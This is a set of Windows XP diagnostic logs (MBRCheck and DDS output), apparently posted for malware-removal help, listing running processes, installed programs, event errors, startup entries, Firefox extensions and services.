    552 C:\Program Files\Microsoft LifeChat\LifeChat.exe
    608 C:\WINDOWS\system32\rundll32.exe
    652 C:\WINDOWS\RTHDCPL.EXE
    664 C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    688 C:\WINDOWS\system32\ctfmon.exe
    800 C:\Program Files\RocketDock\RocketDock.exe
    1100 C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    2272 C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    2332 C:\Program Files\iPod\bin\iPodService.exe
    2528 C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
    2808 alg.exe
    1556 C:\WINDOWS\system32\wuauclt.exe
    236 C:\WINDOWS\system32\mshta.exe
    2952 C:\FIX THIS PC\procexp.exe
    964 C:\WINDOWS\system32\mshta.exe
    628 C:\Program Files\Mozilla Firefox\firefox.exe
    3848 C:\WINDOWS\system32\svchost.exe
    448 C:\Program Files\Mozilla Firefox\plugin-container.exe
    3328 C:\WINDOWS\system32\mshta.exe
    3536 C:\WINDOWS\system32\mshta.exe
    3896 C:\WINDOWS\system32\mshta.exe
    2284 C:\WINDOWS\system32\mshta.exe
    3624 C:\WINDOWS\system32\mshta.exe
    3176 C:\FIX THIS PC\BBS\MBR Check\MBRCheck.exe

    \\.\C: --> \\.\PhysicalDrive0 at offset 0x00000000`00007e00 (NTFS)

    PhysicalDrive0 Model Number: ST3250310AS, Rev: 3.AAA

    Size Device Name MBR Status
    --------------------------------------------
    232 GB \\.\PhysicalDrive0 Windows XP MBR code detected
    SHA1: DA38B874B7713D1B51CBC449F4EF809B0DEC644A


    Done!

    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT

    DDS (Ver_10-12-05.01)

    Microsoft Windows XP Professional
    Boot Device: \Device\HarddiskVolume1
    Install Date: 1/12/2010 2:38:16 PM
    System Uptime: 5/12/2010 2:45:44 PM (7 hours ago)

    Motherboard: Gigabyte Technology Co., Ltd. | | GA-73PVM-S2H
    Processor: Intel Pentium III Xeon processor | Socket 775 | 2500/200mhz
    Processor: Intel Pentium III Xeon processor | Socket 775 | 2500/200mhz

    ==== Disk Partitions =========================

    C: is FIXED (NTFS) - 233 GiB total, 96.205 GiB free.
    D: is CDROM ()
    E: is CDROM (CDFS)

    ==== Disabled Device Manager Items =============

    ==== System Restore Points ===================

    RP1: 1/12/2010 3:02:19 PM - System Checkpoint
    RP2: 3/12/2010 3:06:55 PM - System Checkpoint
    RP3: 4/12/2010 2:45:52 PM - Removed iTunes
    RP4: 4/12/2010 2:55:32 PM - Removed Apple Application Support
    RP5: 4/12/2010 2:57:08 PM - Installed iTunes
    RP6: 4/12/2010 3:06:48 PM - Removed Star Wars Battlefront II
    RP7: 4/12/2010 4:31:57 PM - Installed League of Legends
    RP8: 4/12/2010 5:35:35 PM - Removed Zune Desktop Theme
    RP9: 5/12/2010 11:38:10 AM - Software Distribution Service 3.0
    RP10: 5/12/2010 1:46:47 PM - Software Distribution Service 3.0
    RP11: 5/12/2010 1:57:03 PM - Software Distribution Service 3.0
    RP12: 5/12/2010 1:59:16 PM - Software Distribution Service 3.0

    ==== Installed Programs ======================


    Adobe Anchor Service CS4
    Adobe Bridge CS4
    Adobe CMaps CS4
    Adobe Color - Photoshop Specific CS4
    Adobe Color EU Extra Settings CS4
    Adobe Color JA Extra Settings CS4
    Adobe Color NA Recommended Settings CS4
    Adobe Color Video Profiles CS CS4
    Adobe CSI CS4
    Adobe Default Language CS4
    Adobe ExtendScript Toolkit CS4
    Adobe Flash Player 10 Plugin
    Adobe Fonts All
    Adobe Linguistics CS4
    Adobe Output Module
    Adobe PDF Library Files CS4
    Adobe Photoshop CS4
    Adobe Photoshop CS4 Support
    Adobe Reader 9.4.1
    Adobe Search for Help
    Adobe Service Manager Extension
    Adobe Setup
    Adobe Type Support CS4
    Adobe Update Manager CS4
    Adobe WinSoft Linguistics Plugin
    Adobe XMP Panels CS4
    AdobeColorCommonSetCMYK
    AdobeColorCommonSetRGB
    Alien Swarm
    Any Video Converter 3.0.7
    Apple Application Support
    Apple Mobile Device Support
    Apple Software Update
    Audacity 1.2.6
    BitLord 1.1
    Bonjour
    CCleaner
    Connect
    Crysis WARHEAD(R)
    Crysis Wars(R)
    Crysis(R)
    erLT
    Fallout 3
    Game Booster
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
    Hotfix for Windows XP (KB935448)
    Hotfix for Windows XP (KB952287)
    Hotfix for Windows XP (KB961118)
    iTunes
    Java Auto Updater
    Java(TM) 6 Update 21
    K-Lite Codec Pack 5.8.3 (Full)
    kuler
    League of Legends
    Left 4 Dead
    Left 4 Dead 2
    Left 4 Dead Dedicated Server
    LightScribe 1.4.136.1
    Logitech SetPoint 6.20
    Macromedia Extension Manager
    Macromedia Flash 8
    Macromedia Flash 8 Video Encoder
    Malwarebytes' Anti-Malware
    McAfee SiteAdvisor
    Microsoft .NET Framework 2.0 Service Pack 2
    Microsoft .NET Framework 3.0 Service Pack 2
    Microsoft .NET Framework 3.5 SP1
    Microsoft .NET Framework 4 Client Profile
    Microsoft .NET Framework 4 Extended
    Microsoft Application Error Reporting
    Microsoft Choice Guard
    Microsoft Games for Windows - LIVE
    Microsoft Games for Windows - LIVE Redistributable
    Microsoft Halo
    Microsoft LifeChat
    Microsoft Office 2007 Service Pack 2 (SP2)
    Microsoft Office Access MUI (English) 2007
    Microsoft Office Access Setup Metadata MUI (English) 2007
    Microsoft Office Enterprise 2007
    Microsoft Office Excel MUI (English) 2007
    Microsoft Office Groove MUI (English) 2007
    Microsoft Office Groove Setup Metadata MUI (English) 2007
    Microsoft Office InfoPath MUI (English) 2007
    Microsoft Office Live Add-in 1.3
    Microsoft Office OneNote MUI (English) 2007
    Microsoft Office Outlook MUI (English) 2007
    Microsoft Office PowerPoint MUI (English) 2007
    Microsoft Office Proof (English) 2007
    Microsoft Office Proof (French) 2007
    Microsoft Office Proof (Spanish) 2007
    Microsoft Office Proofing (English) 2007
    Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    Microsoft Office Publisher MUI (English) 2007
    Microsoft Office Shared MUI (English) 2007
    Microsoft Office Shared Setup Metadata MUI (English) 2007
    Microsoft Office Word MUI (English) 2007
    Microsoft Silverlight
    Microsoft Software Update for Web Folders (English) 12
    Microsoft SQL Server 2005 Compact Edition [ENU]
    Microsoft Visual C++ 2005 Redistributable
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
    Mozilla Firefox (3.6.12)
    Mplayer.com
    MSVCRT
    MSXML 4.0 SP2 (KB954430)
    MSXML 4.0 SP2 (KB973688)
    MSXML 4.0 SP2 Parser and SDK
    MSXML 6 Service Pack 2 (KB973686)
    Nero 7 Essentials
    NVIDIA Control Panel 260.99
    NVIDIA Drivers
    NVIDIA Graphics Driver 260.99
    NVIDIA HD Audio Driver 1.1.9.0
    NVIDIA Install Application
    NVIDIA nView 135.36
    NVIDIA nView Desktop Manager
    NVIDIA PhysX
    NVIDIA PhysX System Software 9.10.0514
    OGA Notifier 2.0.0048.0
    Pando Media Booster
    PDF Settings CS4
    PeerGuardian 2.0
    Photoshop Camera Raw
    Pocket Tanks
    PowerDVD
    PunkBuster Services
    QuickTime
    RealPlayer
    Realtek High Definition Audio Driver
    RealUpgrade 1.0
    RocketDock 1.3.5
    Security Update for 2007 Microsoft Office System (KB2288621)
    Security Update for 2007 Microsoft Office System (KB2289158)
    Security Update for 2007 Microsoft Office System (KB2344875)
    Security Update for 2007 Microsoft Office System (KB2345043)
    Security Update for 2007 Microsoft Office System (KB969559)
    Security Update for 2007 Microsoft Office System (KB976321)
    Security Update for CAPICOM (KB931906)
    Security Update for Microsoft .NET Framework 3.5 SP1 (KB2416473)
    Security Update for Microsoft .NET Framework 4 Extended (KB2416472)
    Security Update for Microsoft Office Access 2007 (KB979440)
    Security Update for Microsoft Office Excel 2007 (KB2345035)
    Security Update for Microsoft Office InfoPath 2007 (KB979441)
    Security Update for Microsoft Office Outlook 2007 (KB2288953)
    Security Update for Microsoft Office PowerPoint 2007 (KB982158)
    Security Update for Microsoft Office PowerPoint Viewer (KB2413381)
    Security Update for Microsoft Office Publisher 2007 (KB982124)
    Security Update for Microsoft Office system 2007 (972581)
    Security Update for Microsoft Office system 2007 (KB974234)
    Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
    Security Update for Microsoft Office Word 2007 (KB2344993)
    Security Update for Windows Media Player (KB973540)
    Security Update for Windows Media Player (KB979402)
    Security Update for Windows XP (KB2229593)
    Security Update for Windows XP (KB923561)
    Security Update for Windows XP (KB923789)
    Security Update for Windows XP (KB941569)
    Security Update for Windows XP (KB944338-v2)
    Security Update for Windows XP (KB950762)
    Security Update for Windows XP (KB950974)
    Security Update for Windows XP (KB951376-v2)
    Security Update for Windows XP (KB951748)
    Security Update for Windows XP (KB952004)
    Security Update for Windows XP (KB952954)
    Security Update for Windows XP (KB955069)
    Security Update for Windows XP (KB956572)
    Security Update for Windows XP (KB956802)
    Security Update for Windows XP (KB956803)
    Security Update for Windows XP (KB956844)
    Security Update for Windows XP (KB958470)
    Security Update for Windows XP (KB958644)
    Security Update for Windows XP (KB958869)
    Security Update for Windows XP (KB959426)
    Security Update for Windows XP (KB960803)
    Security Update for Windows XP (KB960859)
    Security Update for Windows XP (KB961501)
    Security Update for Windows XP (KB969059)
    Security Update for Windows XP (KB970238)
    Security Update for Windows XP (KB971032)
    Security Update for Windows XP (KB971468)
    Security Update for Windows XP (KB971657)
    Security Update for Windows XP (KB971961)
    Security Update for Windows XP (KB972270)
    Security Update for Windows XP (KB973507)
    Security Update for Windows XP (KB973869)
    Security Update for Windows XP (KB973904)
    Security Update for Windows XP (KB974112)
    Security Update for Windows XP (KB974318)
    Security Update for Windows XP (KB974392)
    Security Update for Windows XP (KB974571)
    Security Update for Windows XP (KB975025)
    Security Update for Windows XP (KB975467)
    Security Update for Windows XP (KB975560)
    Security Update for Windows XP (KB975561)
    Security Update for Windows XP (KB975562)
    Security Update for Windows XP (KB977816)
    Security Update for Windows XP (KB977914)
    Security Update for Windows XP (KB978037)
    Security Update for Windows XP (KB978338)
    Security Update for Windows XP (KB978542)
    Security Update for Windows XP (KB978601)
    Security Update for Windows XP (KB978706)
    Security Update for Windows XP (KB979309)
    Security Update for Windows XP (KB979482)
    Security Update for Windows XP (KB979559)
    Security Update for Windows XP (KB979683)
    Security Update for Windows XP (KB980218)
    Security Update for Windows XP (KB980232)
    Security Update for Windows XP (KB981350)
    Security Update for Windows XP (KB982381)
    Segoe UI
    Skype Toolbars
    Skypeâ„¢ 5.0
    StarCraft II
    Steam
    Suite Shared Configuration CS4
    TortoiseSVN 1.6.11.20210 (32 bit)
    Ubisoft Game Launcher
    Update for 2007 Microsoft Office System (KB967642)
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
    Update for Microsoft Office OneNote 2007 (KB980729)
    Update for Outlook 2007 Junk Email Filter (KB2443839)
    Update for Windows XP (KB925720)
    Update for Windows XP (KB955759)
    Update for Windows XP (KB961503)
    Update for Windows XP (KB967715)
    Update for Windows XP (KB968389)
    Update for Windows XP (KB973687)
    Update for Windows XP (KB973815)
    Vegas Pro 9.0
    Ventrilo Client
    WebFldrs XP
    Windows Genuine Advantage Notifications (KB905474)
    Windows Genuine Advantage Validation Tool (KB892130)
    Windows Live Call
    Windows Live Communications Platform
    Windows Live Device Manager
    Windows Live Essentials
    Windows Live Messenger
    Windows Live Photo Gallery
    Windows Live Sign-in Assistant
    Windows Live Sync
    Windows Live Upload Tool
    Windows Media Format 11 runtime
    Windows Media Format Runtime
    Windows Media Player 11
    Windows Presentation Foundation
    WinRAR archiver
    X-Mouse Button Control (32bit Version)
    Xilisoft MKV Converter
    XML Paper Specification Shared Components Pack 1.0
    Yahoo! Install Manager

    ==== Event Viewer Messages From Past Week ========

    4/12/2010 9:56:02 AM, error: Service Control Manager [7011] - Timeout (30000 milliseconds) waiting for a transaction response from the nvsvc service.
    4/12/2010 5:56:44 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the HTTP SSL service to connect.
    4/12/2010 5:56:44 PM, error: Service Control Manager [7000] - The HTTP SSL service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    4/12/2010 4:51:18 PM, error: Service Control Manager [7032] - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Management Instrumentation service, but this action failed with the following error: An instance of the service is already running.
    4/12/2010 2:52:40 PM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: sptd
    4/12/2010 2:52:34 PM, error: sptd [4] - Driver detected an internal error in its data structures for .
    29/11/2010 3:57:48 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the IMAPI CD-Burning COM Service service to connect.
    29/11/2010 3:57:48 PM, error: Service Control Manager [7000] - The IMAPI CD-Burning COM Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    2/12/2010 10:18:14 AM, error: Dhcp [1002] - The IP address lease 192.168.1.67 for the Network Card with network address 001FD0D8BABA has been denied by the DHCP server 192.168.1.1 (The DHCP Server sent a DHCPNACK message).
    1/12/2010 4:03:36 PM, error: Dhcp [1002] - The IP address lease 192.168.1.108 for the Network Card with network address 001FD0D8BABA has been denied by the DHCP server 192.168.1.1 (The DHCP Server sent a DHCPNACK message).
    1/12/2010 3:08:30 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the iPod Service service to connect.
    1/12/2010 3:08:30 PM, error: Service Control Manager [7000] - The iPod Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    1/12/2010 3:08:17 PM, error: DCOM [10005] - DCOM got error "%1053" attempting to start the service iPod Service with arguments " " in order to run the server: {063D34A4-BF84-4B8D-B699-E8CA06504DDE}
    1/12/2010 2:40:42 PM, error: Setup [60055] - Windows Setup encountered non-fatal errors during installation. Please check the setuperr.log found in your Windows directory for more information.
    1/12/2010 2:35:34 PM, error: DCOM [10005] - DCOM got error "%1058" attempting to start the service SENS with arguments " " in order to run the server: {D3938AB0-5B9D-11D1-8DD2-00AA004ABD5E}

    ==== End Of File ===========================

    DDS (Ver_10-12-05.01) - NTFSx86
    Run by Marshall at 21:44:46.39 on Sun 05/12/2010
    Internet Explorer: 6.0.2900.2180 BrowserJavaVersion: 1.6.0_21
    Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.2046.1259 [GMT 11:00]


    ============== Running Processes ===============

    C:\WINDOWS\system32\nvsvc32.exe
    C:\WINDOWS\system32\svchost -k DcomLaunch
    svchost.exe
    C:\WINDOWS\System32\svchost.exe -k netsvcs
    svchost.exe
    svchost.exe
    C:\WINDOWS\System32\svchost.exe -k netsvcs
    C:\WINDOWS\system32\spoolsv.exe
    svchost.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    C:\WINDOWS\system32\PnkBstrA.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    C:\Program Files\Logitech\SetPointP\SetPoint.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Microsoft LifeChat\LifeChat.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\RocketDock\RocketDock.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
    C:\WINDOWS\system32\wuauclt.exe
    C:\WINDOWS\System32\mshta.exe
    C:\FIX THIS PC\procexp.exe
    C:\WINDOWS\System32\mshta.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\System32\svchost.exe -k HTTPFilter
    C:\Program Files\Mozilla Firefox\plugin-container.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\FIX THIS PC\BBS\DDS\dds.scr

    ============== Pseudo HJT Report ===============

    uStart Page = about:blank
    uInternet Settings,ProxyOverride = *.local
    uURLSearchHooks: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - No File
    BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
    BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
    BHO: Groove GFS Browser Helper: {72853161-30c5-4d22-b7f9-0bbc1d38a37e} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
    BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: Skype Plug-In: {ae805869-2e5c-4ed4-8f7b-f1f7851a4497} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
    BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
    BHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    TB: {472734EA-242A-422B-ADF8-83D1E48CC825} - No File
    uRun: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "c:\program files\common files\ahead\lib\NMBgMonitor.exe "
    uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
    uRun: [RocketDock] "c:\program files\rocketdock\RocketDock.exe "
    uRun: [WindowsLivePhone] "c:\program files\windows live\device manager\msgrdvmn.exe" /AutoRun
    mRun: [AdobeCS4ServiceManager] "c:\program files\common files\adobe\cs4servicemanager\CS4ServiceManager.exe" -launchedbylogin
    mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe "
    mRun: [WindowsLivePhone] c:\program files\windows live\device manager\msgrdvmn.exe /AutoRun
    mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray
    mRun: [EvtMgr6] c:\program files\logitech\setpointp\SetPoint.exe /launchGaming
    mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe "
    mRun: [LifeChat] "c:\program files\microsoft lifechat\LifeChat.exe "
    mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
    mRun: [NvCplDaemon] RUNDLL32.EXE c:\windows\system32\NvCpl.dll,NvStartup
    mRun: [nwiz] c:\program files\nvidia corporation\nview\nwiz.exe /installquiet
    mRun: [RTHDCPL] RTHDCPL.EXE
    dRun: [CTFMON.EXE] c:\windows\system32\CTFMON.EXE
    mPolicies-explorer: NoAutorun = 1 (0x1)
    IE: E&xport to Microsoft Excel - c:\progra~1\mi1933~1\office12\EXCEL.EXE/3000
    IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
    IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
    IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\progra~1\mi1933~1\office12\ONBttnIE.dll
    IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
    IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\mi1933~1\office12\REFIEBAR.DLL
    DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} - c:\program files\yahoo!\common\Yinsthelper.dll
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
    DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\program files\microsoft office\office12\GrooveSystemServices.dll
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
    Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
    SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
    SEH: Groove GFS Stub Execution Hook: {b5a7f190-dda6-4420-b3ba-52453494e6cd} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll

    ================= FIREFOX ===================

    FF - ProfilePath - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\
    FF - prefs.js: browser.startup.homepage - hxxp://www.houstontexans.com/news/calendar.html
    FF - component: c:\documents and settings\marshall\application data\mozilla\firefox\profiles\gga8nyz2.default\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}\platform\winnt_x86-msvc\components\WeaveCrypto.dll
    FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
    FF - component: c:\program files\mozilla firefox\extensions\{ab2ce124-6272-4b12-94a9-7303c7397bd1}\components\SkypeFfComponent.dll
    FF - plugin: c:\documents and settings\all users\application data\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
    FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
    FF - plugin: c:\program files\microsoft\office live\npOLW.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npdeployJava1.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npyaxmpb.dll
    FF - plugin: c:\program files\pando networks\media booster\npPandoWebPlugin.dll
    FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
    FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
    FF - Extension: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c:\program files\mozilla firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
    FF - Extension: Skype extension: {AB2CE124-6272-4b12-94A9-7303C7397BD1} - c:\program files\mozilla firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1}
    FF - Extension: Java Console: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
    FF - Extension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
    FF - Extension: Firefox Sync: {340c2bbc-ce74-4362-90b5-7c26312808ef} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}
    FF - Extension: StumbleUpon: {AE93811A-5C9A-4d34-8462-F7B864FC4696} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}
    FF - Extension: Password Exporter: {B17C1C5A-04B1-11DB-9804-B622A1EF5492} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}
    FF - Extension: Flash and Video Download: {bee6eb20-01e0-ebd1-da83-080329fb9a3a} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a}
    FF - Extension: DownThemAll!: {DDC359D1-844A-42a7-9AA1-88A850A938A8} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
    FF - Extension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
    FF - Extension: Java Quick Starter: jqs@sun.com - c:\program files\java\jre6\lib\deploy\jqs\ff
    FF - Extension: McAfee SiteAdvisor: {B7082FAA-CB62-4872-9106-E42DD88EDE45} - c:\program files\mcafee\SiteAdvisor

    ---- FIREFOX POLICIES ----
    FF - user.js: browser.cache.memory.capacity - 65536
    FF - user.js: browser.chrome.favicons - false
    FF - user.js: browser.display.show_image_placeholders - true
    FF - user.js: browser.turbo.enabled - true
    FF - user.js: browser.urlbar.autocomplete.enabled - true
    FF - user.js: browser.urlbar.autofill - true
    FF - user.js: browser.xul.error_pages.enabled - true
    FF - user.js: content.interrupt.parsing - true
    FF - user.js: content.max.tokenizing.time - 3000000
    FF - user.js: content.maxtextrun - 8191
    FF - user.js: content.notify.backoffcount - 5
    FF - user.js: content.notify.interval - 750000
    FF - user.js: content.notify.ontimer - true
    FF - user.js: content.switch.threshold - 750000
    FF - user.js: network.http.max-connections - 32
    FF - user.js: network.http.max-connections-per-server - 8
    FF - user.js: network.http.max-persistent-connections-per-proxy - 8
    FF - user.js: network.http.max-persistent-connections-per-server - 4
    FF - user.js: network.http.pipelining - true
    FF - user.js: network.http.pipelining.firstrequest - true
    FF - user.js: network.http.pipelining.maxrequests - 8
    FF - user.js: network.http.proxy.pipelining - true
    FF - user.js: network.http.request.max-start-delay - 0
    FF - user.js: nglayout.initialpaint.delay - 0
    FF - user.js: plugin.expose_full_path - true
    FF - user.js: ui.submenuDelay - 0

    ============= SERVICES / DRIVERS ===============

    R2 LBeepKE;Logitech Beep Suppression Driver;c:\windows\system32\drivers\LBeepKE.sys [2010-12-4 10448]
    R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-7-14 363344]
    R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2010-7-14 88176]
    R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-7-14 20952]
    R3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda32.sys [2007-11-10 100712]
    S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
    S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [2010-7-14 1691480]
    S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]

    =============== Created Last 30 ================

    2010-12-05 02:52:33 -------- d-----w- c:\program files\MSXML 6.0
    2010-12-05 00:44:28 -------- d-----w- c:\windows\ServicePackFiles
    2010-12-04 23:45:53 -------- d-----w- c:\docume~1\alluse~1\applic~1\Kaspersky Lab Setup Files
    2010-12-04 23:44:36 -------- d-----w- c:\windows\system32\CatRoot_bak
    2010-12-04 23:34:53 272128 -c----w- c:\windows\system32\dllcache\bthport.sys
    2010-12-04 23:32:10 454016 -c----w- c:\windows\system32\dllcache\mrxsmb.sys
    2010-12-04 23:30:18 2181376 -c----w- c:\windows\system32\dllcache\ntoskrnl.exe
